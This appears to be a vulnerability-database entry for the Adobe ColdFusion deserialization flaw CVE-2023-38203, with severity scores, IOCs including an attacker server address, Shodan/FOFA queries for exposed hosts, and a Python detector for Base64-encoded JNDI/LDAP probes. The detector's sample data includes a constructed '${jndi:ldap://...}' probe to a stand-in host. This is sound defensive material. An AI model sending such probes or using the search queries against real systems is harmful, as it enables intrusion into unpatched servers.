cbcvebase.
CVE-2023-38203
published 2023-07-20


Priority: P1 (99) · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware
CISA Known Exploited Vulnerability (due 2024-01-29)
Exploited in the wild
EPSS: 97.00% (99.9th percentile)
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.

Affected (4 ranges)

Vendor | Product    | Version range | Fixed in
adobe  | coldfusion | <= cf2023U2
adobe  | coldfusion |
adobe  | coldfusion |
adobe  | coldfusion |

Detection & IOCs (extracted from sources)

url: /CFIDE/adminapi/base.cfc?method=
hash: 7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
hash: 590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
hash: 808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
hash: 4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a
filename: svhost.exe
filename: scvhost.exe
filename: obfs.ps1
filename: recon.ps1
path: C:\Windows\Debug\a.conf
command: argumentCollection={{jndi}}
snort: Adobe.ColdFusion.CVE-2023-38203.Insecure.Deserialization
  • Payloads are frequently Base64-encoded; decode HTTP POST bodies to /CFIDE/ endpoints for JNDI/LDAP strings indicating exploitation attempts.
  • Attackers use interactsh-based domains for probing/validation of the exploit; monitor DNS callbacks to interactsh infrastructure as an indicator of active exploitation.
  • Post-exploitation: look for Rclone binaries masquerading as svhost.exe or scvhost.exe performing data exfiltration to MegaSync cloud storage.
  • Shodan/FOFA queries can identify exposed ColdFusion instances: http.component:"Adobe ColdFusion", http.title:"coldfusion administrator login", app="Adobe-ColdFusion".
  • The Nuclei template targets /CFIDE/adminapi/base.cfc while Fortinet observed attacks against /CFIDE/adminapi/accessmanager.cfc — both endpoints should be monitored as attack vectors for CVE-2023-38203.
  • Storm-0501 exploitation of ColdFusion is attributed to 'possibly CVE-2023-29300 or CVE-2023-38203' — the specific CVE used in each intrusion was not definitively confirmed.
  • Attacker files on the HFS public server (103.255.177.55:6895) were frequently updated during the campaign, meaning hashes may not represent the full set of malware variants deployed.
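The first and fifth notes above (decode Base64-encoded POST bodies to the /CFIDE/adminapi endpoints and look for JNDI/LDAP strings, watching both base.cfc and accessmanager.cfc) as an added detection example; this is illustrative code written for this page, not a rule from any of the cited sources, and the request samples, marker regex and callback domain are constructed.

```python
import base64
import re
from typing import List, Optional
from urllib.parse import unquote

# Endpoints named in the detection notes (Nuclei template and Fortinet observation).
WATCHED_PATHS = ("/cfide/adminapi/base.cfc", "/cfide/adminapi/accessmanager.cfc")
# JNDI/LDAP lookup markers; one in a POST body to a watched endpoint is the signal.
MARKERS = re.compile(r"\$\{jndi:|jndi:(?:ldap|rmi|dns)://|ldap://", re.IGNORECASE)
# Runs that look like base64: 16+ alphabet characters plus optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def body_views(body: str) -> List[str]:
    """Raw body, URL-decoded body, and the decoded form of every base64-looking run."""
    decoded = unquote(body)
    views = [body, decoded]
    for token in B64_TOKEN.findall(decoded):
        token = token.rstrip("=")
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not real base64, skip it
            continue
        views.append(raw.decode("utf-8", errors="replace"))
    return views

def inspect_request(method: str, path: str, body: str) -> Optional[dict]:
    """Return a finding for a suspicious POST to a watched endpoint, else None."""
    if method.upper() != "POST" or path.split("?", 1)[0].lower() not in WATCHED_PATHS:
        return None
    for index, view in enumerate(body_views(body)):
        hit = MARKERS.search(view)
        if hit:  # views 0 and 1 are the raw/URL-decoded body; later ones are base64 runs
            return {"path": path, "marker": hit.group(0), "base64_encoded": index >= 2}
    return None

# Constructed sample requests (not captured traffic): a base64-encoded JNDI/LDAP probe to one
# watched endpoint, a benign call to the other, and the probe to an unrelated path (not flagged).
PROBE_BODY = "argumentCollection=" + base64.b64encode(
    b'{"x":"${jndi:ldap://callback.example.invalid/a}"}').decode()
BENIGN_BODY = "argumentCollection=" + base64.b64encode(b'{"name":"ping"}').decode()
SAMPLE_REQUESTS = [
    ("POST", "/CFIDE/adminapi/base.cfc?method=test", PROBE_BODY),
    ("POST", "/CFIDE/adminapi/accessmanager.cfc?method=test", BENIGN_BODY),
    ("POST", "/index.cfm", PROBE_BODY),
]

def scan(requests=SAMPLE_REQUESTS) -> List[dict]:
    """Run the check over (method, path, body) tuples and collect the findings."""
    return [f for f in (inspect_request(*r) for r in requests) if f]
```

The check is deliberately scoped to the two named endpoints, so a JNDI string posted elsewhere is not reported; widen WATCHED_PATHS if the environment exposes other .cfc paths under /CFIDE/adminapi.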

CVSS provenance

nvd (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL
cisa: 9.8 CRITICAL